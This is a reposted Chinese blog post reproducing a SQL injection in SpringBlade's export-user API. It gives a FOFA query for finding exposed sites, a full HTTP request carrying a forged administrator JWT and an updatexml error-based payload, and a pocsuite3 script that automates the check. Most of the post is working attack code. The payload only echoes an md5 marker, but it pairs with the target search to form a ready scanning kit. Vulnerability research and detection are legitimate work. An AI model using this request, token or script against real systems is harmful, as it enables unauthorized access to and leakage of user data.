当前位置:   article > 正文

漏洞复现-SpringBlade export-user SQL 注入漏洞(附漏洞检测脚本)_bladex 漏洞集合

bladex 漏洞集合

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

漏洞描述

该系统/api/blade-user/export-user接口存在SQL注入漏洞,会造成数据泄露。

fofa语句

body="https://bladex.vip"

poc加检测

  1. GET /api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1 HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate, br
  7. Connection: keep-alive
  8. Upgrade-Insecure-Requests: 1
  9. Sec-Fetch-Dest: document
  10. Sec-Fetch-Mode: navigate
  11. Sec-Fetch-Site: none
  12. Sec-Fetch-User: ?1

poc脚本

脚本使用的pocsuite框架

  1. # _*_ coding:utf-8 _*_
  2. # @Time : 2024/1/21
  3. # @Author: 炼金术师诸葛亮
  4. from pocsuite3.api import Output, POCBase, register_poc, requests, logger
  5. from pocsuite3.api import get_listener_ip, get_listener_port
  6. from pocsuite3.api import REVERSE_PAYLOAD, random_str
  7. class springboot_apiblade_sql(POCBase):
  8. pocDesc = '''SpringBlade export-user SQL 注入漏洞'''
  9. author = '炼金术师诸葛亮'
  10. createDate = '2024-1-21'
  11. name = 'SpringBlade export-user SQL 注入漏洞'
  12. def _verify(self):
  13. result = {}
  14. url = self.url+ '/api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1'
  15. try:
  16. response = requests.get(url)
  17. if response.status_code == 200 and '6cfe798ba8e5b85feb50164c59f4bec' in response.text:
  18. result['VerifyInfo'] = {}
  19. return self.parse_output(result)
  20. except Exception as e:
  21. pass
  22. register_poc(springboot_apiblade_sql)

脚本利用

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/天景科技苑/article/detail/739322
推荐阅读
相关标签
  

闽ICP备14008679号